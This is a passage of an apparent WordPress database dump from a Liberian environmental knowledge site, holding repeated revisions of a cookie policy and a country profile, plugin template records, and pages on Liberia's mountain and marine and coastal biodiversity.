make subtle changes to the way that the site is delivered. When we are still testing new features these cookies may be used to ensure that you receive a consistent experience whilst on the site whilst ensuring we understand which optimisations our users appreciate the most.</p></li><li><p>We also use social media buttons and/or plugins on this site that allow you to connect with your social network in various ways. For these to work the following social media sites including; {List the social networks whose features you have integrated with your site?:12}, will set cookies through our site which may be used to enhance your profile on their site or contribute to the data they hold for various purposes outlined in their respective privacy policies.</p></li></ul><p><strong>More Information</strong></p><p>Hopefully that has clarified things for you and as was previously mentioned if there is something that you aren\'t sure whether you need or not it\'s usually safer to leave cookies enabled in case it does interact with one of the features you use on our site. </p><p>However if you are still looking for more information then you can contact us through one of our preferred contact methods:</p><ul><li>Email: <a href=\"mailto:contact@ekmsliberia.info\">contact@ekmsliberia.info</a></li></ul>','Cookies Privacy Policy','','inherit','closed','closed','','102-revision-v1','','','2019-11-09 07:53:03','2019-11-09 07:53:03','',102,'https://ekmsliberia.info/102-revision-v1/',0,'revision','',0),(435,1,'2019-11-09 07:53:23','2019-11-09 07:53:23','<h1>Cookie Policy for Environmental Knowledge Management System</h1>		\n		<p>This is the Cookie Policy for Environmental Knowledge Management System, accessible from <a style=\"font-size: 15px; background-color: #ffffff;\" href=\"https://ekmsliberia.info\">https://ekmsliberia.info</a></p><h2><strong>What Are Cookies</strong></h2><p>As is common practice with almost all professional websites this site uses cookies, which are tiny files that are downloaded to your computer, to improve your experience. This page describes what information they gather, how we use it and why we sometimes need to store these cookies. We will also share how you can prevent these cookies from being stored however this may downgrade or \'break\' certain elements of the sites functionality.</p><p>For more general information on cookies see the Wikipedia article on HTTP Cookies.</p><h2><strong>How We Use Cookies</strong></h2><p>We use cookies for a variety of reasons detailed below. Unfortunately in most cases there are no industry standard options for disabling cookies without completely disabling the functionality and features they add to this site. It is recommended that you leave on all cookies if you are not sure whether you need them or not in case they are used to provide a service that you use.</p><h2><strong>Disabling Cookies</strong></h2><p>You can prevent the setting of cookies by adjusting the settings on your browser (see your browser Help for how to do this). Be aware that disabling cookies will affect the functionality of this and many other websites that you visit. Disabling cookies will usually result in also disabling certain functionality and features of the this site. Therefore it is recommended that you do not disable cookies.</p><h2><strong>The Cookies We Set</strong></h2><ul><li><p>Account related cookies</p><p>If you create an account with us then we will use cookies for the management of the signup process and general administration. These cookies will usually be deleted when you log out however in some cases they may remain afterwards to remember your site preferences when logged out.</p></li><li><p>Login related cookies</p><p>We use cookies when you are logged in so that we can remember this fact. This prevents you from having to log in every single time you visit a new page. These cookies are typically removed or cleared when you log out to ensure that you can only access restricted features and areas when logged in.</p></li><li><p>Email newsletters related cookies</p><p>This site offers newsletter or email subscription services and cookies may be used to remember if you are already registered and whether to show certain notifications which might only be valid to subscribed/unsubscribed users.</p></li><li><p>Forms related cookies</p><p>When you submit data to through a form such as those found on contact pages or comment forms cookies may be set to remember your user details for future correspondence.</p></li><li><p>Site preferences cookies</p><p>In order to provide you with a great experience on this site we provide the functionality to set your preferences for how this site runs when you use it. In order to remember your preferences we need to set cookies so that this information can be called whenever you interact with a page is affected by your preferences.</p></li></ul><h2><strong>Third Party Cookies</strong></h2><p>In some special cases we also use cookies provided by trusted third parties. The following section details which third party cookies you might encounter through this site.</p><ul><li><p>This site uses Google Analytics which is one of the most widespread and trusted analytics solution on the web for helping us to understand how you use the site and ways that we can improve your experience. These cookies may track things such as how long you spend on the site and the pages that you visit so we can continue to produce engaging content.</p><p>For more information on Google Analytics cookies, see the official Google Analytics page.</p></li><li><p>From time to time we test new features and make subtle changes to the way that the site is delivered. When we are still testing new features these cookies may be used to ensure that you receive a consistent experience whilst on the site whilst ensuring we understand which optimisations our users appreciate the most.</p></li><li><p>We also use social media buttons and/or plugins on this site that allow you to connect with your social network in various ways. For these to work the following social media sites including; {List the social networks whose features you have integrated with your site?:12}, will set cookies through our site which may be used to enhance your profile on their site or contribute to the data they hold for various purposes outlined in their respective privacy policies.</p></li></ul><p><strong>More Information</strong></p><p>Hopefully that has clarified things for you and as was previously mentioned if there is something that you aren\'t sure whether you need or not it\'s usually safer to leave cookies enabled in case it does interact with one of the features you use on our site. </p><p>However if you are still looking for more information then you can contact us through one of our preferred contact methods:</p><ul><li>Email: <a href=\"mailto:contact@ekmsliberia.info\">contact@ekmsliberia.info</a></li></ul>','Cookies Privacy Policy','','inherit','closed','closed','','102-revision-v1','','','2019-11-09 07:53:23','2019-11-09 07:53:23','',102,'https://ekmsliberia.info/102-revision-v1/',0,'revision','',0),(437,1,'2019-11-09 08:02:01','2019-11-09 08:02:01','The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4°21‘N and 8°33‘ north of the equator and longitudes 11°28‘W and 7°32‘W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. Côte d‘Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with Côte d‘Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\nLiberia‘s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).','Country Profile','','inherit','closed','closed','','76-revision-v1','','','2019-11-09 08:02:01','2019-11-09 08:02:01','',76,'https://ekmsliberia.info/76-revision-v1/',0,'revision','',0),(438,1,'2019-11-09 08:02:29','2019-11-09 08:02:29','<h2>Liberia</h2>		\n		The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4°21‘N and 8°33‘ north of the equator and longitudes 11°28‘W and 7°32‘W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. Côte d‘Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with Côte d‘Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\nLiberia‘s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).','Country Profile','','inherit','closed','closed','','76-revision-v1','','','2019-11-09 08:02:29','2019-11-09 08:02:29','',76,'https://ekmsliberia.info/76-revision-v1/',0,'revision','',0),(439,1,'2019-11-09 08:02:49','2019-11-09 08:02:49','<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n			<h2>Liberia</h2>		\n		The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4°21‘N and 8°33‘ north of the equator and longitudes 11°28‘W and 7°32‘W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. Côte d‘Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with Côte d‘Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\nLiberia‘s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).','Country Profile','','inherit','closed','closed','','76-revision-v1','','','2019-11-09 08:02:49','2019-11-09 08:02:49','',76,'https://ekmsliberia.info/76-revision-v1/',0,'revision','',0),(440,1,'2019-11-09 08:04:08','2019-11-09 08:04:08','','seal','','inherit','open','closed','','seal','','','2019-11-09 08:04:08','2019-11-09 08:04:08','',76,'https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png',0,'attachment','image/png',0),(441,1,'2019-11-09 08:04:41','2019-11-09 08:04:41','<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/seal-oggff16qadtyvrhvexcnek8bp1m843rynrm8f2ohs4.png\" title=\"seal\" alt=\"seal\" />											\n			<h2>Liberia</h2>		\n		The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4°21‘N and 8°33‘ north of the equator and longitudes 11°28‘W and 7°32‘W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. Côte d‘Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with Côte d‘Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\nLiberia‘s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).','Country Profile','','inherit','closed','closed','','76-revision-v1','','','2019-11-09 08:04:41','2019-11-09 08:04:41','',76,'https://ekmsliberia.info/76-revision-v1/',0,'revision','',0),(442,1,'2019-11-09 08:05:06','2019-11-09 08:05:06','<img width=\"150\" height=\"150\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal-150x150.png\" alt=\"\" />											\n			<h2>Liberia</h2>		\n		The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4°21‘N and 8°33‘ north of the equator and longitudes 11°28‘W and 7°32‘W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. Côte d‘Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with Côte d‘Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\nLiberia‘s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).','Country Profile','','inherit','closed','closed','','76-revision-v1','','','2019-11-09 08:05:06','2019-11-09 08:05:06','',76,'https://ekmsliberia.info/76-revision-v1/',0,'revision','',0),(443,1,'2019-11-09 08:05:32','2019-11-09 08:05:32','<img width=\"150\" height=\"150\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal-150x150.png\" alt=\"\" />											\n			<h2>Liberia</h2>		\n		The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4°21‘N and 8°33‘ north of the equator and longitudes 11°28‘W and 7°32‘W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. Côte d‘Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with Côte d‘Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\nLiberia‘s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).','Country Profile','','inherit','closed','closed','','76-revision-v1','','','2019-11-09 08:05:32','2019-11-09 08:05:32','',76,'https://ekmsliberia.info/76-revision-v1/',0,'revision','',0),(444,1,'2019-11-09 08:05:53','2019-11-09 08:05:53','<img width=\"150\" height=\"150\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal-150x150.png\" alt=\"\" />											\n			<h2>Liberia</h2>		\n		The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4°21‘N and 8°33‘ north of the equator and longitudes 11°28‘W and 7°32‘W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. Côte d‘Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with Côte d‘Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\nLiberia‘s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).','Country Profile','','inherit','closed','closed','','76-revision-v1','','','2019-11-09 08:05:53','2019-11-09 08:05:53','',76,'https://ekmsliberia.info/76-revision-v1/',0,'revision','',0),(445,1,'2019-11-09 08:07:14','2019-11-09 08:07:14','<img width=\"150\" height=\"150\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal-150x150.png\" alt=\"\" />											\n			<h2>Liberia</h2>		\n		<p>The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.</p><p>The extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4°21‘N and 8°33‘ north of the equator and longitudes 11°28‘W and 7°32‘W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.</p><p>The perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. Côte d‘Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with Côte d‘Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.</p><p>Liberia‘s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).</p>','Country Profile','','inherit','closed','closed','','76-revision-v1','','','2019-11-09 08:07:14','2019-11-09 08:07:14','',76,'https://ekmsliberia.info/76-revision-v1/',0,'revision','',0),(446,1,'2019-11-09 08:08:15','2019-11-09 08:08:15','<img width=\"150\" height=\"150\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal-150x150.png\" alt=\"\">\n<h2>Liberia</h2>\nThe Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.\n\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4°21‘N and 8°33‘ north of the equator and longitudes 11°28‘W and 7°32‘W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\n\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. Côte d‘Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with Côte d‘Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\n\nLiberia‘s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).','Country Profile','','inherit','closed','closed','','76-revision-v1','','','2019-11-09 08:08:15','2019-11-09 08:08:15','',76,'https://ekmsliberia.info/76-revision-v1/',0,'revision','',0),(447,1,'2019-11-09 08:11:37','2019-11-09 08:11:37','<img width=\"150\" height=\"150\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal-150x150.png\" alt=\"\" />											\n			<h2>Republic of Liberia</h2>		\n		<p>Liberia is a relatively small country located within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia  is approximately 111,369 km2 and is the fifth smallest country in Africa.</p><p>The extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4°21‘N and 8°33‘ north of the equator and longitudes 11°28‘W and 7°32‘W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.</p><p>The perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. Côte d‘Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with Côte d‘Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.</p><p>Liberia‘s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).</p>','Country Profile','','inherit','closed','closed','','76-revision-v1','','','2019-11-09 08:11:37','2019-11-09 08:11:37','',76,'https://ekmsliberia.info/76-revision-v1/',0,'revision','',0),(448,1,'2019-11-09 08:12:30','2019-11-09 08:12:30','<img width=\"150\" height=\"150\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal-150x150.png\" alt=\"\" />											\n			<h2>Republic of Liberia</h2>		\n		<p>Liberia is a relatively small country located within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia  is approximately 111,369 km2 and is the fifth smallest country in Africa.</p><p>The extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4°21‘N and 8°33‘ north of the equator and longitudes 11°28‘W and 7°32‘W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.</p><p>The perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. Côte d‘Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with Côte d‘Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.</p><p>Liberia‘s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).</p>','Country Profile','','inherit','closed','closed','','76-revision-v1','','','2019-11-09 08:12:30','2019-11-09 08:12:30','',76,'https://ekmsliberia.info/76-revision-v1/',0,'revision','',0),(449,1,'2019-11-09 08:43:57','2019-11-09 08:43:57','','Project Resources','','publish','closed','closed','','project_resource','','','2019-11-20 00:46:50','2019-11-20 00:46:50','',0,'https://ekmsliberia.info/?post_type=_pods_pod&#038;p=449',0,'_pods_pod','',0),(450,1,'2019-11-09 09:04:01','2019-11-09 09:04:01','','Project Status','','publish','closed','closed','','project_status','','','2019-11-20 00:46:51','2019-11-20 00:46:51','',449,'https://ekmsliberia.info/?post_type=_pods_field&#038;p=450',2,'_pods_field','',0),(453,1,'2019-11-09 09:04:04','2019-11-09 09:04:04','','Project Link','','publish','closed','closed','','project_link','','','2019-11-20 00:46:51','2019-11-20 00:46:51','',449,'https://ekmsliberia.info/?post_type=_pods_field&#038;p=453',3,'_pods_field','',0),(462,1,'2019-11-09 10:10:34','2019-11-09 10:10:34','<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>System ID: {@ID}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Status: {@project_status}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Implemented by: {@resource_tag}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Funded By: {@funder}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Partner: {@partners}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Link: {@project_link}</p>','Project Resource Template','','publish','closed','closed','','project-resource-template','','','2019-11-20 00:50:29','2019-11-20 00:50:29','',0,'https://ekmsliberia.info/?post_type=_pods_template&#038;p=462',0,'_pods_template','',0),(463,1,'2019-11-09 10:10:34','2019-11-09 10:10:34','<p>Project ID: {@ID}</p>\r\n<p>Status: {@project_status}</p>\r\n<p>Category: {@resource_category}</p>\r\n<p>Implemented by: {@resource_tag}</p>\r\n<p>Contact E-mail: {@contact_email}</p>\r\n<p>Contact Phone: {@contact_phone}</p>\r\n<p>Project Link: {@project_link}</p>','Project Resource Template','','inherit','closed','closed','','462-revision-v1','','','2019-11-09 10:10:34','2019-11-09 10:10:34','',462,'https://ekmsliberia.info/462-revision-v1/',0,'revision','',0),(465,1,'2019-11-09 11:35:21','2019-11-09 11:35:21','','Resource Types','','publish','closed','closed','','resource_type','','','2019-11-09 11:36:22','2019-11-09 11:36:22','',0,'https://ekmsliberia.info/?post_type=_pods_pod&#038;p=465',0,'_pods_pod','',0),(467,1,'2019-11-09 12:07:24','2019-11-09 12:07:24','Mountains ecosystems are actually associated with the terrestrial ecosystems because they are found on highlands. They provide an array of habitats where a large number of animals and plants can be found. Like other ecosystems such as those described above, the mountain ecosystems host plant and animal species that can adapt to the influence of elevation and climate of the area.\r\n\r\nMountain ecosystems are home to a wide variety of animals and plants species. The ecological richness and beautiful features of Liberia‘s mountain landscapes make for attractive tourist destinations. Unfortunately, the tourism sector of Liberia is still underdeveloped and so is unable to utilize the opportunities which these mountain ecosystems provide.\r\n\r\nThe mountains and mountain ranges identified in Liberia are Nimba, Wologisi, Bong Range, Gibi, Putu, Bomi, Wutivi, Mano, Bea, Kpo Range, and Wenegissi (Ref: Liberia National Biodiversity Strategy and Action Plan 2017-2025). It must be noted here, though, that four of these mountains and mountain ranges –Bong Range, Gibi Mountain, Kpo Range, Bomi Mountain, have been exploited for iron ore. Meanwhile, ArcelorMittal, a multinational mining giant , has gathered more information about the various species of birds of which the mountains of the Nimba Range serve as habitat.Previously, the total species list for the Nimba Range stood at 413. Because of the research on birds that AML had supported, the current list of birds of the Nimba Range is now 615 (AML 2010).','Mountain Biodiversity','Mountains ecosystems are actually associated with the terrestrial ecosystems because they are found on highlands. ','publish','closed','closed','','mountain-biodiversity','','','2020-11-09 09:51:02','2020-11-09 09:51:02','',0,'https://ekmsliberia.info/?post_type=related_topic&#038;p=467',21,'related_topic','',0),(468,1,'2019-11-09 12:25:33','2019-11-09 12:25:33','Liberia has a coastline of about 560 km (350 miles) and about 58% of the country‘s population live along the coast. With an area of continental shelf of about 14, 894 square kilometres and territorial seas of up to about 159,200 square kilometres, this coastline annually produces about 7616 metric tonnes of fish and about 126 metric tonnes of molluscs and crustaceans. The coastal belt consists of swamp related vegetation, which includes mangrove forests and savannah woodland related vegetation that extend up to 25 km inland.\r\n\r\nMarine and inland fisheries and aquaculture are the two main components of the Liberian fishery system. Marine fishery accounts for most of the fish catch of the country. The continental shelf provides habitat for various species of fish and crustaceans such as tuna, mackerel, shrimp and lobsters. The continental shelf covers 70,000 sq. miles, but it is of irregular shape. Artisanal fisheries cover about 20,000 km2 of fishing grounds. This sector accounts for a workforce of 10,000 people, including full time, part-time, sport fishermen and fishmongers. The pelagic and some demersal fish species that are being exploited are Sardinellas (Sardinella maderenensis and Sardinella aurita), Chub or Spanish mackerel (Scomberja ponicus), Bonga (Ethmalosa fimbriata) and Anchovy (Engraulisecncrasicolus). Species of the Carangidae and Thunidae Families are also recorded. Other important demersal fish group exploited by marine artisanal fishers belongs to the Sparidae, Pomadasidae, Scienidae and Serranidae Families. Large quantities of crustaceans, particularly shrimps and lobsters, are also exploited.\r\n\r\nThe Bureau of National Fisheries (2013) reported that a National Fishery Policy was being developed under the FAO supported regional fishery capacity building project. The identification of Marine Protected Areas is now a high agenda issue of the Government of Liberia. An Artisanal Fishing Craft Registry has been set up, and regulations developed. In 2017, approximately 6000 artisanal crafts had been registered. Artisanal fishery provides livelihoods for approximately 33,000 full-time fishers and fish processors in the coastal counties and there are an estimated 3,473 canoes operating in the waters of Liberia with only 8% motorized.\r\n\r\nThe industrial fishery is a high capital investment venture that uses fishing trawlers and cold storage facilities. There are 14 fishing companies operating in Liberia. Six companies are exclusively engaged in the importation of frozen fish from the high sea, eight are operating 27 fishing vessels with a combined gross registered tonnage of approximately 4,000 tonnes. The employment of Liberian nationals in industrial fishery is estimated at 75%, representing 28% of the total employment in the fishery sector. Foreign nationals presently dominate ownership in industrial fishery. Fish farming in Liberia is largely subsistence and about 3,561 fish farmers nationwide are engaged in some form of fish culture on a part-time basis. Four hundred and forty nine (449) fish ponds of various sizes with a total area of 17.47 hectares are operating in 159 communities around the country. Most of these ponds have been dormant since 1990 and are now being rehabilitated. A total of 704 women are participating in aquaculture (NBSAP Inventory &amp; Stocktaking Report 2013).','Marine and Coastal Biodiversity','Liberia has a coastline of about 560 km (350 miles) and about 58% of the country‘s population live along the coast.','publish','closed','closed','','marine-and-coastal-biodiversity','','','2019-11-25 20:39:17','2019-11-25 20:39:17','',0,'https://ekmsliberia.info/?post_type=related_topic&#038;p=468',20,'related_topic','',0),(469,1,'2019-11-09 12:30:31','2019-11-09 12:30:31','Liberia‘s island ecosystems are relatively small in size. They however do have key characteristics that distinguish them from other ecosystems because of their dual nature: terrestrial-aquatic characteristics. They are actually terrestrial in nature but surrounded by aquatic environment. Those that are well-known because of their historical significance are Providence and Bushrod Islands in Montserrado and Wetlands and Massa (Massatin) Island in 